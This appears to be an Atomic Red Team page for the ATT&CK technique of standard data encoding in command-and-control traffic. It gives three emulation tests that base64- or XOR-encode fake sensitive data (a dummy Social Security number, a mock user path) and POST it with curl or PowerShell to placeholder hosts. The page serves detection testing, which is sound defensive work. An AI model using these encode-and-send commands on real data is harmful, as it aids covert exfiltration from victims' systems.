T1132.001 - Data Encoding: Standard Encoding

Description from ATT&CK

Adversaries may encode data with a standard data encoding system to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system that adheres to existing protocol specifications. Common data encoding schemes include ASCII, Unicode, hexadecimal, Base64, and MIME.(Citation: Wikipedia Binary-to-text Encoding)(Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.

Atomic Tests


Atomic Test #1 - Base64 Encoded data.

Utilizing a common technique for posting base64 encoded data.

Supported Platforms: macOS, Linux

auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | destination_url | Destination URL to post encoded data. | url | redcanary.com| | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|

Attack Commands: Run with
1
sh
!

1
2
echo -n 111-11-1111 | base64
curl -XPOST #{base64_data}.#{destination_url}



Atomic Test #2 - Base64 Encoded data (freebsd)

Utilizing a common technique for posting base64 encoded data.

Supported Platforms: Linux

auto_generated_guid: 2d97c626-7652-449e-a986-b02d9051c298

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | destination_url | Destination URL to post encoded data. | url | redcanary.com| | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|

Attack Commands: Run with
1
sh
!

1
2
echo -n 111-11-1111 | b64encode -r -
curl -XPOST #{base64_data}.#{destination_url}

Dependencies: Run with
1
sh
!

Description: Requires curl
Check Prereq Commands:
1
if [ -x "$(command -v curl)" ]; then exit 0; else exit 1; fi;
Get Prereq Commands:
1
pkg install -y curl



Atomic Test #3 - XOR Encoded data.

XOR encodes the data with a XOR key. Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f

Supported Platforms: Windows

auto_generated_guid: c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08

Inputs:

| Name | Description | Type | Default Value | |——|————-|——|—————| | destination_url | Destination URL to post encoded data. | url | example.com| | plaintext | Plain text mimicking victim data sent to C2 server. | string | Path\n—-\nC:\Users\victim| | key | XOR key used for encoding the plaintext. | string | abcdefghijklmnopqrstuvwxyz123456|

Attack Commands: Run with
1
powershell
!

1
2
3
4
5
6
7
8
9
$plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
$key = "#{key}"
$cyphertext =  @();
for ($i = 0; $i -lt $plaintext.Count; $i++) {
 $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
}
$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
[System.Net.ServicePointManager]::Expect100Continue = $false
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive